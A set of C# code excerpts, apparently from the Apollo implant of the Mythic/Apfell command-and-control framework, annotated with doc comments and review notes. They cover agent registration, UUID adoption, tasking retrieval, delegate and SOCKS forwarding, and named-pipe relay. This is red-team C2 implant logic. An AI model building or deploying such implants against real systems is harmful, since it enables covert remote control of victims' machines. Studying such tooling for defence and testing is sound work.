Example #1
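        /// <summary>
        /// Register the agent with the Apfell server and adopt the UUID the server assigns.
        /// </summary>
        /// <param name="agent">The agent to register; it is serialized to JSON and sent as the registration body.</param>
        /// <returns>
        /// UUID of the newly registered agent, or an empty string when <c>Send</c>
        /// reports that the registration message was not sent.
        /// </returns>
        /// <exception cref="Exception">
        /// The reply is missing, does not contain "success", or carries no id.
        /// </exception>
        override public string RegisterAgent(Apollo.Agent agent)
        {
            DebugWriteLine("Attempting to serialize agent...");
            string json = JsonConvert.SerializeObject(agent);

            // NOTE(review): the whole serialized registration body is written to the debug output here.
            DebugWriteLine($"[+] InitializeImplant - Sending {json}");

            // Fresh GUID under which the reply is looked up in Inbox.
            string id = Guid.NewGuid().ToString();

            if (!Send(id, json))
            {
                return("");
            }

            DebugWriteLine("Successfuly sent registration message!");
            string result = (string)Inbox.GetMessage(id);

            // A missing reply is reported the same way as a rejected registration
            // instead of surfacing as a NullReferenceException.
            // NOTE(review): Contains is a substring match on the raw reply text; the
            // documented reply shape is { "status": "success", "id": <id> }.
            if (result == null || !result.Contains("success"))
            {
                throw (new Exception("Failed to retrieve an ID for new callback."));
            }

            JObject resultJSON = (JObject)JsonConvert.DeserializeObject(result);
            string  newUUID    = resultJSON.Value<string>("id");

            // Do not hand an absent id to the cryptor or back to the caller.
            if (string.IsNullOrEmpty(newUUID))
            {
                throw (new Exception("Failed to retrieve an ID for new callback."));
            }

            cryptor.UpdateUUID(newUUID);
            return(newUUID);
        }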
        /// <summary>
        /// Sends the serialized agent as a registration message and adopts the UUID from the reply.
        /// </summary>
        /// <param name="agent">The agent to register; serialized to JSON as the message body.</param>
        /// <returns>
        /// The id taken from the reply, or an empty string when the reply does not contain "success".
        /// </returns>
        /// <exception cref="Exception">Thrown when <c>Send</c> reports failure.</exception>
        public override string RegisterAgent(Apollo.Agent agent)
        {
            string registrationJson = JsonConvert.SerializeObject(agent);

            // Fresh GUID under which the reply is looked up in Inbox.
            string id = Guid.NewGuid().ToString();

            DebugWriteLine($"Sending registration message with ID {id}...");
            if (!Send(id, registrationJson))
            {
                throw (new Exception("Failed to retrieve an ID for new callback."));
            }

            DebugWriteLine($"SUCCESS! Sent registration message with ID {id}");
            DebugWriteLine($"Waiting for reply to registration message with ID {id}...");
            string reply = (string)Inbox.GetMessage(id);
            DebugWriteLine($"SUCCESS! Got reply to registration message with ID {id}...");

            // NOTE(review): substring match on the raw reply; a reply without
            // "success" falls through to the empty-string return rather than throwing.
            if (!reply.Contains("success"))
            {
                return("");
            }

            // Response is { "status": "success", "id": <id> }
            JObject parsedReply  = (JObject)JsonConvert.DeserializeObject(reply);
            string  assignedUuid = parsedReply.Value<string>("id");
            cryptor.UpdateUUID(assignedUuid);
            return(assignedUuid);
        }
Example #3
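            /// <summary>
            /// Deserializes the current tasking message into a queue of tasks and delegate messages.
            /// </summary>
            /// <param name="agent">Not read by this implementation.</param>
            /// <returns>
            /// A <c>Structs.TaskQueue</c> whose <c>Tasks</c> and <c>Delegates</c> arrays hold what the
            /// response carried; either array is empty when the response has no such entries.
            /// </returns>
            public override Structs.TaskQueue GetMessages(Apollo.Agent agent)
            {
                List<Task> finalTaskList = new List<Task>();
                List<Structs.DelegateMessage> finalDelegateList = new List<Structs.DelegateMessage>();

                Structs.CheckTaskingResponse resp = JsonConvert.DeserializeObject<Structs.CheckTaskingResponse>(GetTaskingMessage());

                // tasks gets the same null guard as delegates, so a response
                // without a task list yields an empty queue instead of throwing.
                if (resp.tasks != null)
                {
                    foreach (Task task in resp.tasks)
                    {
                        Debug.WriteLine("[-] CheckTasking - NEW TASK with ID: " + task.id);
                        finalTaskList.Add(task);
                    }
                }

                if (resp.delegates != null)
                {
                    // Each dictionary entry maps a UUID (key) to its message (value).
                    foreach (Dictionary<string, string> delegateMessage in resp.delegates)
                    {
                        foreach (KeyValuePair<string, string> item in delegateMessage)
                        {
                            finalDelegateList.Add(new Structs.DelegateMessage()
                            {
                                UUID    = item.Key,
                                Message = item.Value
                            });
                        }
                    }
                }

                return new Structs.TaskQueue()
                {
                    Tasks     = finalTaskList.ToArray(),
                    Delegates = finalDelegateList.ToArray()
                };
            }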
Example #4
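            /// <summary>
            /// Sends a "get_tasking" request, forwarding any queued delegate messages, and
            /// converts the reply into a queue of tasks and delegate messages.
            /// </summary>
            /// <param name="agent">Not read by this implementation.</param>
            /// <returns>
            /// A <c>Structs.TaskQueue</c> built from the reply; both arrays are empty when
            /// <c>Send</c> reports failure or the reply carries no entries.
            /// </returns>
            public override Structs.TaskQueue GetMessages(Apollo.Agent agent)
            {
                List<Task> finalTaskList = new List<Task>();
                List<Structs.DelegateMessage> finalDelegateList = new List<Structs.DelegateMessage>();

                Structs.CheckTaskingRequest req = new Structs.CheckTaskingRequest()
                {
                    action       = "get_tasking",
                    tasking_size = 1
                };

                if (DelegateMessageRequestQueue.Count > 0)
                {
                    DelegateMessageRequestMutex.WaitOne();
                    try
                    {
                        // Drain the queue into the outgoing request.
                        req.delegates = DelegateMessageRequestQueue.ToArray();
                        DelegateMessageRequestQueue.Clear();
                    }
                    finally
                    {
                        // Release even if draining throws, so other users of the mutex are not blocked forever.
                        DelegateMessageRequestMutex.ReleaseMutex();
                    }
                }

                string json      = JsonConvert.SerializeObject(req);
                // Fresh GUID under which the reply is looked up in Inbox.
                string taskingId = Guid.NewGuid().ToString();

                if (Send(taskingId, json))
                {
                    string response = (string)Inbox.GetMessage(taskingId);
                    Mythic.Structs.CheckTaskingResponse resp = JsonConvert.DeserializeObject<Mythic.Structs.CheckTaskingResponse>(response);

                    // tasks gets the same null guard as delegates, so a reply
                    // without a task list yields an empty queue instead of throwing.
                    if (resp.tasks != null)
                    {
                        foreach (Task task in resp.tasks)
                        {
                            Debug.WriteLine("[-] CheckTasking - NEW TASK with ID: " + task.id);
                            finalTaskList.Add(task);
                        }
                    }

                    if (resp.delegates != null)
                    {
                        // Each dictionary entry maps a UUID (key) to its message (value).
                        foreach (Dictionary<string, string> delegateMessage in resp.delegates)
                        {
                            foreach (KeyValuePair<string, string> item in delegateMessage)
                            {
                                finalDelegateList.Add(new Structs.DelegateMessage()
                                {
                                    UUID    = item.Key,
                                    Message = item.Value
                                });
                            }
                        }
                    }
                }

                return new Structs.TaskQueue()
                {
                    Tasks     = finalTaskList.ToArray(),
                    Delegates = finalDelegateList.ToArray()
                };
            }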
Example #5
 /// <summary>
 /// Returns the messages waiting for <paramref name="agent"/> as a task queue.
 /// Abstract: each derived class supplies the implementation.
 /// </summary>
 /// <param name="agent">The agent the messages are requested for.</param>
 /// <returns>The task queue produced by the derived implementation.</returns>
 public abstract Structs.TaskQueue GetMessages(Apollo.Agent agent);
Example #6
            //public abstract string PostResponse(Structs.DownloadFileRegistrationMessage taskresp);

            /// <summary>
            /// Registers <paramref name="agent"/> and returns a string result.
            /// Abstract: each derived class supplies the implementation.
            /// </summary>
            /// <param name="agent">The agent to register.</param>
            /// <returns>A string produced by the derived implementation (presumably the agent's UUID; confirm against the overrides).</returns>
            public abstract string RegisterAgent(Apollo.Agent agent);
Example #7
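        /// <summary>
        /// Check the Apfell endpoint for new tasking.
        /// </summary>
        /// <param name="agent">Not read by this implementation.</param>
        /// <returns>
        /// A task queue holding the tasks, delegate messages and SOCKS datagrams found in the
        /// reply. <c>Tasks</c> and <c>Delegates</c> are empty arrays when <c>Send</c> reports
        /// failure or the reply carries none.
        /// </returns>
        override public Mythic.Structs.TaskQueue GetMessages(Apollo.Agent agent)
        {
            Stopwatch sw = new Stopwatch();

            // NOTE(review): the SendSocksDatagrams call this first measurement was written
            // for is commented out, so the elapsed time logged below covers no work.
            sw.Start();
            //SendSocksDatagrams();
            sw.Stop();
            DebugWriteLine($"SendSocksDatagrams took {Utils.StringUtils.FormatTimespan(sw.Elapsed)} to run.");
            sw.Restart();

            TaskQueue              response                 = new TaskQueue();
            List<Task>             finalTaskList            = new List<Task>();
            List<DelegateMessage>  finalDelegateMessageList = new List<DelegateMessage>();
            CheckTaskingRequest    req = new CheckTaskingRequest()
            {
                action       = "get_tasking",
                // NOTE(review): -1 presumably asks for all pending tasks; confirm against the server API.
                tasking_size = -1
            };

            if (DelegateMessageRequestQueue.Count > 0)
            {
                DelegateMessageRequestMutex.WaitOne();
                try
                {
                    // Drain the queue into the outgoing request.
                    req.delegates = DelegateMessageRequestQueue.ToArray();
                    DelegateMessageRequestQueue.Clear();
                }
                finally
                {
                    // Release even if draining throws, so other users of the mutex are not blocked forever.
                    DelegateMessageRequestMutex.ReleaseMutex();
                }
            }
            else
            {
                req.delegates = new Dictionary<string, string>[] { };
            }

            string json = JsonConvert.SerializeObject(req);
            // Fresh GUID under which the reply is looked up in Inbox.
            string id   = Guid.NewGuid().ToString();

            if (Send(id, json))
            {
                string returnMsg = (string)Inbox.GetMessage(id);
                Mythic.Structs.CheckTaskingResponse resp = JsonConvert.DeserializeObject<Mythic.Structs.CheckTaskingResponse>(returnMsg);
                if (resp.tasks != null)
                {
                    foreach (Task task in resp.tasks)
                    {
                        Debug.WriteLine("[-] CheckTasking - NEW TASK with ID: " + task.id);
                        finalTaskList.Add(task);
                    }
                }
                if (resp.delegates != null)
                {
                    foreach (Dictionary<string, string> delmsg in resp.delegates)
                    {
                        if (delmsg == null)
                        {
                            continue;
                        }

                        // Each entry maps a UUID (key) to its message (value). An empty
                        // dictionary contributes nothing instead of throwing, and a
                        // dictionary with several entries contributes all of them.
                        foreach (KeyValuePair<string, string> entry in delmsg)
                        {
                            finalDelegateMessageList.Add(new DelegateMessage()
                            {
                                UUID    = entry.Key,
                                Message = entry.Value
                            });
                        }
                    }
                }
                if (resp.socks != null)
                {
                    response.SocksDatagrams = resp.socks;
                }
            }
            response.Delegates = finalDelegateMessageList.ToArray();
            response.Tasks     = finalTaskList.ToArray();
            sw.Stop();
            DebugWriteLine($"Get tasking took {Utils.StringUtils.FormatTimespan(sw.Elapsed)} to run.");
            return(response);
        }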
 /// <summary>
 /// Tasking retrieval is not implemented by this class.
 /// </summary>
 /// <param name="agent">Unused.</param>
 /// <returns>Never returns.</returns>
 /// <exception cref="NotImplementedException">Always thrown.</exception>
 public override Mythic.Structs.TaskQueue GetMessages(Apollo.Agent agent)
 {
     throw new NotImplementedException();
 }
        /// <summary>
        /// Waits for a client to connect to the server stream, announces this agent's UUID to
        /// it, and, while the agent still carries the payload UUID, sends a registration
        /// message through the client and adopts the UUID returned in the "checkin" reply.
        /// </summary>
        /// <remarks>
        /// Message types written by this method: "uuid_registration" (the current UUID, sent
        /// as "staging-" + UUID while unregistered, then again with the new UUID after a
        /// successful check-in) and "register" (the encrypted, serialized agent).
        /// </remarks>
        /// <param name="agent">The agent to register; serialized to JSON and encrypted with <c>base.cryptor</c>.</param>
        /// <returns>
        /// The new UUID after a successful registration; the existing UUID when the agent is
        /// already registered; an empty string when sending the "register" message fails.
        /// </returns>
        /// <exception cref="Exception">The "checkin" reply does not contain "success".</exception>
        public override string RegisterAgent(Apollo.Agent agent)
        {
            // Get JSON string for implant
            string json = JsonConvert.SerializeObject(agent);

            // Registration body: the JSON encrypted by the cryptor, then UTF-8 encoded.
            byte[] reqPayload = Encoding.UTF8.GetBytes(base.cryptor.Encrypt(json));
            // A connection from an earlier call is dropped and the server stream recreated
            // before waiting for the next client.
            if (holdConnection)
            {
                serverStream.Close();
                serverStream   = CreateNamedPipeServer();
                holdConnection = false;
            }
            // presumably blocks until a pipe client connects (serverStream's type is not visible here) -- confirm
            serverStream.WaitForConnection();
            holdConnection = true;
            // A new reader thread is started on every call.
            // NOTE(review): not visible here whether a reader from a previous connection has exited by now.
            Thread t = new Thread(() => ReadAndSortMessages());

            t.Start();
            SMBMessage uuidRegistration = new SMBMessage()
            {
                MessageType   = "uuid_registration",
                MessageObject = base.cryptor.GetUUIDBytes()
            };

            // This is the payload uuid, so we need to stage and get the new one
            if (base.cryptor.GetUUIDString() == baseUUID)
            {
                //uuidRegistration.MessageType = "staging_uuid_registration";
                // While unregistered, the announced identifier is the payload UUID prefixed with "staging-".
                uuidRegistration.MessageObject = Encoding.UTF8.GetBytes("staging-" + base.cryptor.GetUUIDString());
                SMBMessage registerMsg = new SMBMessage()
                {
                    MessageType   = "register",
                    MessageObject = reqPayload
                };
                // Get JSON string for implant
                //string result = Send(registrationId, registerMsg);
                string result;
                DebugWriteLine($"Sending uuid_registration message to client...");
                // NOTE(review): the return value of this Send is ignored, yet the next line logs success.
                Send(uuidRegistration);
                DebugWriteLine($"SUCCESS! Sent uuid_registration message!");
                DebugWriteLine($"Sending Apfell registration message to client...");

                if (Send(registerMsg))
                {
                    DebugWriteLine($"SUCCESS! Sent Apfell registration message!");
                    DebugWriteLine($"Waiting for initial checkin response from Apfell server...");
                    // The reply is looked up under the fixed key "checkin" rather than a per-request id.
                    result = (string)Inbox.GetMessage("checkin");
                    // NOTE(review): the raw reply is written to the debug output here.
                    DebugWriteLine($"SUCCESS! Got initial checkin response from Apfell server!\n\t{result}");
                    // NOTE(review): result is not checked for null, and Contains is a substring
                    // match on the raw reply rather than a check of the parsed "status" field.
                    if (result.Contains("success"))
                    {
                        // If it was successful, initialize implant
                        // Response is { "status": "success", "id": <id> }
                        JObject resultJSON = (JObject)JsonConvert.DeserializeObject(result);
                        string  newUUID    = resultJSON.Value <string>("id");
                        base.cryptor.UpdateUUID(newUUID);
                        // Tell the connected client which UUID this agent now uses.
                        SMBMessage notifyRelayMessage = new SMBMessage()
                        {
                            MessageType   = "uuid_registration",
                            MessageObject = Encoding.UTF8.GetBytes(newUUID)
                        };
                        // Do something with bool?
                        Send(notifyRelayMessage);
                        return(newUUID);
                    }
                    else
                    {
                        throw (new Exception("Failed to retrieve an ID for new callback."));
                    }
                }
                // Reached only when sending the "register" message failed.
                return("");
            }
            else
            {
                // we've already got an agent uuid, return that.
                Send(uuidRegistration);
                return(base.cryptor.GetUUIDString());
            }
        }